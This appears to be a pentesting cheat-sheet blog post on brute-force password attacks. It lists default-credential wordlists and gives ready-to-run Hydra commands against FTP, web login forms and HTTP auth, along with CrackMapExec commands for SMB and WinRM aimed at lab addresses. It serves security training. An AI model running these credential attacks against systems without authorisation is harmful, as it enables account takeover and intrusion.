Home Pentesting - Brute Force
Post
Cancel

Pentesting - Brute Force

Default Credentials

Some wordlists that contain default passwords for different services:

  • SecLists

  • Rockyou

  • https://github.com/ihebski/DefaultCreds-cheat-sheet/blob/main/DefaultCreds-Cheat-Sheet.csv

  • https://github.com/govolution/betterdefaultpasslist

  • https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/darkweb2017-top100.txt

  • https://github.com/ihebski/DefaultCreds-cheat-sheet

creds is a interesting tool to looking for default credentials for a service.

Installation:

1
pip3 install defaultcreds-cheat-sheet

Example:

1
creds search tomcat

Personalized Wordlists

There are some tools that create a custom dictionary, for example cupp:

Command:

1
cupp -i

Brute Force to Services

Hydra is a password-cracking tool used for performing brute-force and dictionary attacks to gain unauthorized access to password-protected systems or services.

Syntax with dictionaries:

1
hydra -L <pathFile-usernames> –P <pathFile-passwords> <IP> -s <port> <service>

Syntax command with known credentials:

1
hydra -l <username> -p <password> <IP> <service>

It can also be combined:

1
hydra -l <username> -P <pathFile-passwords> <IP> <service>

or:

1
hydra -L <pathFile-usernames> -p <password> <IP> <service>

Examples:

1
hydra -L users.list -P passwords.list ftp://10.129.150.181:2121
1
hydra -L users.list -P passwords.list 10.129.150.181:2121 ftp

Brute Force to Login

Syntax:

1
hydra -l <username> -P </passwords_list.txt> <target> http-post-form "/<login-page.php>:<fieldUsername>=<username>&<fieldPassword>=^PASS^:<text>"

Example:

1
hydra -l admin -P ./passwords.txt monitoring.inlanefreight.local http-post-form "/login.php:username=admin&password=^PASS^:Invalid Credentials!"

Other example:

1
hydra -l admin -P ./rockyou.txt 10.129.166.127 http-post-form "/monitoring/login.php:username=admin&password=^PASS^:Invalid Credentials!"

The parameters should be obtained by right-clicking with the mouse and inspecting the login page. The fields to be brute forced should be inspected.

The text at the end of the command is to search for different responses other than that message.

Example of brute force attack to login popup

1
hydra -C /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 167.99.197.55 -s 30705 http-get /

Password Attacks

Crackmapexec

CrackMapExec (CME) is a powerful post-exploitation tool used by cybersecurity professionals, red teamers, and ethical hackers. It is primarily designed for network reconnaissance, lateral movement, and exploitation during penetration testing and security assessments.

Syntax command:

1
crackmapexec <protocol> <target> -u <user or userlist> -p <password or passwordlist>

Examples:

1
crackmapexec winrm 10.129.42.197 -u user.list -p password.list
1
crackmapexec smb 10.129.42.197 -u "user" -p "password"
This post is licensed under CC BY 4.0 by the author.